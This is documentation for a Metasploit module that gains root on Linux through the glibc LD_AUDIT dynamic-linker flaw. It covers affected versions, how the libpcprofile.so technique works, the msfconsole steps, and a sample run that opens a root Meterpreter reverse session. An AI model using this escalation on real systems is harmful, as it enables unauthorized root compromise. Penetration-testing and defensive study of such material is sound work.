## Description

  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker to load arbitrary shared objects.


## Vulnerable Application

  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows loading arbitrary shared objects from the trusted library search path with the privileges of the suid user.

  This module uses `LD_AUDIT` to load the `libpcprofile.so` shared object, distributed with some versions of glibc, and leverages arbitrary file creation functionality in the library constructor to write a root-owned world-writable file to a system trusted search path (usually `/lib`). The file is then overwritten with a shared object then loaded with `LD_AUDIT` resulting in arbitrary code execution.

  This module has been tested successfully on:

  * glibc version 2.11.1 on Ubuntu 10.04 (x86_64)
  * glibc version 2.7 on Debian 5.0.4 (i386)

  RHEL 5 is reportedly affected, but untested.

  Some glibc distributions do not contain the `libpcprofile.so` library required for successful exploitation.


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc`
  4. Do: `set SESSION [SESSION]`
  5. Do: `check`
  6. Do: `run`
  7. You should get a new *root* session


## Options

### SESSION

  Which session to use, which can be viewed with `sessions`

### WritableDir

  A writable directory file system path. (default: `/tmp`)


## Scenarios

  ```
  msf > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
session => 1
  msf exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [+] The target appears to be vulnerable
  [*] Using target: Linux x64
  [*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
  [*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
  [*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (857352 bytes) to 172.16.191.149
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.149
  OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```

